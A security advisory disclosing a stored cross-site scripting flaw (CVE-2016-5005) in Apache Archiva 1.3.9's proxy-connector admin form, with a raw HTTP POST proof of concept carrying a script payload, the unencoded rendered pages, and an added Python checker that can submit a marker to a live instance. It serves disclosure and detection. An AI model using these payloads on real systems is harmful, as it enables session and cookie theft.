Apache Archiva 1.3.9 Cross Site Scripting
Posted on 12 July 2016
RCE Security Advisory
https://www.rcesecurity.com


1. ADVISORY INFORMATION
=======================
Product:        Apache Archiva
Vendor URL:     https://archiva.apache.org
Type:           Cross-Site Scripting [CWE-79]
Date found:     2016-05-31
Date published: 2016-07-11
CVSSv3 Score:   5.5 (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N)
CVE:            CVE-2016-5005


2. CREDITS
==========
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.


3. VERSIONS AFFECTED
====================
Apache Archiva v1.3.9
Older versions may be affected too.


4. INTRODUCTION
===============
"Apache Archiva™ is an extensible repository management software that helps
taking care of your own personal or enterprise-wide build artifact
repository. It is the perfect companion for build tools such as Maven,
Continuum, and ANT."
(from the vendor's homepage)


5. VULNERABILITY DETAILS
========================
The script "/archiva/admin/addProxyConnector_commit.action" is affected by an
authenticated, persistent (stored) Cross-Site Scripting vulnerability in its
handling of the HTTP POST parameter "connector.sourceRepoId". The application
neither validates this parameter on input nor HTML-encodes it on output, so
an administrator can store arbitrary script code that is then rendered on the
"Administration - Proxy Connectors" page as well as on the "Admin: Delete
Proxy Connector" page.
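The following Python script is an added example and is not part of the original advisory or of Apache Archiva: it rebuilds the advisory's POST body with a benign marker in place of the script tag, models the vulnerable and hardened ways of rendering the ID cell, and checks a fetched page for the marker surviving unencoded. The path of the proxy-connector listing page is not given in the advisory, so the live check takes it as a caller-supplied argument; the `<p class="id">` cell layout and the sample page are taken from the response excerpt quoted below.

```python
"""Added example (not from the RCE Security advisory or Apache Archiva):
scripted check for the CVE-2016-5005 pattern, i.e. a proxy-connector source
repository ID that an Archiva 1.3.x admin page renders without HTML entity
encoding. Assumptions: the listing page path is supplied by the caller, a
benign <u> marker stands in for a script tag, and the ID is rendered inside
<p class="id">...</p> as in the advisory's response excerpt."""
import html
import re
from urllib.parse import urlencode
from urllib.request import Request, urlopen

COMMIT_PATH = "/archiva/admin/addProxyConnector_commit.action"  # from the advisory

# Benign marker: if the <u> element survives intact in the rendered ID cell,
# the value is being emitted raw and a script payload would be too.
MARKER = "xsscheck<u>cve-2016-5005</u>"

# Constructed sample, copied from the rendered output quoted in the advisory.
SAMPLE_VULNERABLE_PAGE = """<div class="managedRepo">
  <img src="/archiva/images/archiva-splat-32.gif">
  <p class="id">XSS<script>alert(document.cookie)</script></p>
  <p class="name"></p>
</div>"""

ID_CELL = re.compile(r'<p class="id">(.*?)</p>', re.S)


def build_connector_form(source_repo_id, target_repo_id):
    """Rebuild the advisory's POST body with the attacker-controlled
    connector.sourceRepoId substituted; urlencode() yields the same
    %28direct+connection%29 and %5B%27...%27%5D spellings as the PoC."""
    fields = [
        ("pattern", ""),
        ("connector.order", "0"),
        ("connector.proxyId", "(direct connection)"),
        ("connector.sourceRepoId", source_repo_id),
        ("connector.targetRepoId", target_repo_id),
        ("connector.policies['propagate-errors-on-update']", "always"),
        ("connector.policies['cache-failures']", "no"),
        ("connector.policies['releases']", "always"),
        ("connector.policies['propagate-errors']", "stop"),
        ("connector.policies['checksum']", "fail"),
        ("connector.policies['snapshots']", "always"),
        ("propertyKey", ""),
        ("propertyValue", ""),
        ("blackListPattern", ""),
        ("whiteListPattern", ""),
    ]
    return urlencode(fields)


def render_id_cell(source_repo_id, escape=True):
    """Model of the two template behaviours: the vulnerable page interpolates
    the raw ID, the hardened page entity-encodes it first (html.escape turns
    < > & " ' into entities, which is the fix for this bug class)."""
    value = html.escape(source_repo_id, quote=True) if escape else source_repo_id
    return f'<p class="id">{value}</p>'


def rendered_unescaped(page_html, marker):
    """True if some ID cell contains the marker byte-for-byte, i.e. the
    markup inside it was not encoded on output."""
    return any(cell == marker for cell in ID_CELL.findall(page_html))


def check_instance(base_url, session_cookie, list_path, target_repo_id,
                   marker=MARKER):
    """Live check (not exercised offline): add a connector whose source ID is
    the marker, fetch the proxy-connector listing (path supplied by the
    caller, since the advisory does not name it) and report whether the
    marker came back raw. Needs an admin session cookie and leaves a
    connector behind that must be deleted by hand afterwards."""
    headers = {"Cookie": session_cookie,
               "Content-Type": "application/x-www-form-urlencoded"}
    body = build_connector_form(marker, target_repo_id).encode()
    urlopen(Request(base_url + COMMIT_PATH, data=body, headers=headers,
                    method="POST")).read()
    page = urlopen(Request(base_url + list_path, headers=headers)).read()
    return rendered_unescaped(page.decode("utf-8", errors="replace"), marker)


if __name__ == "__main__":
    payload = "XSS<script>alert(document.cookie)</script>"
    print(build_connector_form(payload, "com.springsource.repository.bundles.external"))
    print("advisory excerpt renders raw:",
          rendered_unescaped(SAMPLE_VULNERABLE_PAGE, payload))
    print("vulnerable template:", render_id_cell(MARKER, escape=False))
    print("hardened template:  ", render_id_cell(MARKER, escape=True))
```

The marker is compared byte-for-byte against the cell contents rather than searched as a substring, so a page that encodes the value (`&lt;u&gt;`) is reported as not affected even though the text of the marker is still visible.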
The following Proof-of-Concept triggers this vulnerability and adds a new
proxy connector called "XSS<script>alert(document.cookie)</script>":

POST /archiva/admin/addProxyConnector_commit.action HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Cookie: JSESSIONID=1vabu6a1f9wye; rbkSignon=7574033ea6d44b4a9722cfa53a7b4001; _ga=GA1.2.1956020753.1461333249; __utma=86544839.1956020753.1461333249.1461575160.1461575160.1; __utmz=86544839.1461575160.1.1.utmcsr=premium_main|utmccn=(not%20set)|utmcmd=(not%20set)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 567

pattern=&connector.order=0&connector.proxyId=%28direct+connection%29&connector.sourceRepoId=XSS<script>alert(document.cookie)</script>&connector.targetRepoId=com.springsource.repository.bundles.external&connector.policies%5B%27propagate-errors-on-update%27%5D=always&connector.policies%5B%27cache-failures%27%5D=no&connector.policies%5B%27releases%27%5D=always&connector.policies%5B%27propagate-errors%27%5D=stop&connector.policies%5B%27checksum%27%5D=fail&connector.policies%5B%27snapshots%27%5D=always&propertyKey=&propertyValue=&blackListPattern=&whiteListPattern=

The payload is then rendered unencoded on the "Administration - Proxy
Connectors" page:

<div class="managedRepo">
  <img src="/archiva/images/archiva-splat-32.gif">
  <p class="id">XSS<script>alert(document.cookie)</script></p>
  <p class="name"></p>
</div>

And on the "Admin: Delete Proxy Connector" page:

<p>
  Are you sure you want to delete proxy connector
  <code>[ XSS<script>alert(document.cookie)</script> , maven2-repository.dev.java.net ]</code> ?
</p>


6. RISK
=======
To successfully exploit this vulnerability, a user with administrative
rights must trick another authenticated user with administrative rights
into visiting one of the affected pages.
Since this scenario is quite unlikely, the attack likelihood can be
increased by combining this vulnerability with the Cross-Site Request
Forgery vulnerability described in RCESEC-2016-003 (CVE-2016-4469).

The vulnerability allows remote attackers to permanently embed arbitrary
script code into the context of the Apache Archiva administrative backend
interface, which offers a wide range of possible attacks such as stealing
cookies or attacking the browser and its components of a user visiting the
page.


7. SOLUTION
===========
Upgrade/Migrate to Apache Archiva 2.2.1


8. REPORT TIMELINE
==================
2016-05-31: Discovery of the vulnerability
2016-05-31: Notified vendor via public security mail address
2016-06-06: No response, sent out another notification
2016-06-10: Vendor states that this version is out of support
2016-07-07: Vendor assigns CVE-2016-5005
2016-07-11: Advisory released


9. REFERENCES
=============
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5005